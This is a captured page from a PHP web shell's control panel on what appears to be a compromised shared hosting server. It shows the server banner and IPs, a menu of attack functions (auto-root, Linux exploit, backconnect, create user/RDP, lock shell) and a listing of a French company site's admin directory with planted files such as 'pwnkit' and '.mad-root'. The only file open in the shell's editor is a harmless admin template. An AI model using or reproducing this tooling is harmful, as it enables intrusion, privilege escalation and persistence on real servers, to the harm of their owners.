Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
quaadraa /
admin /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
contacts.php
2.22
KB
-rw----r--
dashboard.php
3.3
KB
-rw----r--
layout.php
4.61
KB
-rw----r--
login.php
1.73
KB
-rw----r--
news-edit.php
15.52
KB
-rw----r--
news-form.php
7.39
KB
-rw----r--
news.php
3.55
KB
-rw----r--
page-edit.php
16.18
KB
-rw----r--
pages.php
3
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
settings.php
4.46
KB
-rw----r--
subsidiaries.php
2.1
KB
-rw----r--
subsidiary-edit.php
3.76
KB
-rw----r--
users.php
3.48
KB
-rw----r--
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : subsidiaries.php
<?php /* admin/views/subsidiaries.php */ ?> <?php if (isset($_GET['success'])): ?> <div class="alert alert-success">✅ Filiale mise à jour avec succès.</div> <?php endif; ?> <?php if (isset($_GET['deleted'])): ?> <div class="alert alert-success">🗑 Filiale supprimée avec succès.</div> <?php endif; ?> <div class="admin-breadcrumb"> <a href="/admin">Dashboard</a> / <span>Filiales</span> </div> <div class="admin-table-wrap"> <table class="admin-table"> <thead> <tr> <th>Nom (FR)</th> <th>Actions</th> </tr> </thead> <tbody> <?php if (empty($subs)): ?> <tr> <td colspan="2" style="text-align:center;padding:2rem;color:#5e5e5e">Aucune filiale trouvée.</td> </tr> <?php else: ?> <?php foreach ($subs as $s): ?> <tr> <td style="color:#f0ece4;font-weight:600;"><?= htmlspecialchars($s['name'] ?? 'Sans nom') ?></td> <td> <a href="/admin/subsidiaries/<?= $s['id'] ?>/edit" class="tbl-action" style="margin-right:1rem;">✏️ Modifier</a> <form action="/admin/subsidiaries/<?= $s['id'] ?>/delete" method="POST" style="display:inline;"> <input type="hidden" name="_csrf" value="<?= htmlspecialchars($csrf) ?>"> <button type="submit" class="tbl-action" style="border:none; background:none; color:#e74c3c; cursor:pointer; padding:0;" onclick="return confirm('⚠️ Attention : Voulez-vous vraiment supprimer « <?= htmlspecialchars($s['name']) ?> » ?');"> 🗑 Supprimer </button> </form> </td> </tr> <?php endforeach; ?> <?php endif; ?> </tbody> </table> </div> <style> .admin-breadcrumb { margin-bottom:1.5rem;font-size:.82rem;color:#5e5e5e; } .admin-breadcrumb a { color:#C9A84C; } .tbl-action { color:#C9A84C;font-size:.82rem;font-weight:600; text-decoration:none; } .tbl-action:hover { text-decoration:underline; } .alert { padding:.85rem 1.25rem;margin-bottom:1.5rem;font-size:.88rem; } .alert-success { background:rgba(39,174,96,.1);border:1px solid rgba(39,174,96,.3);color:#27ae60; } </style>
Close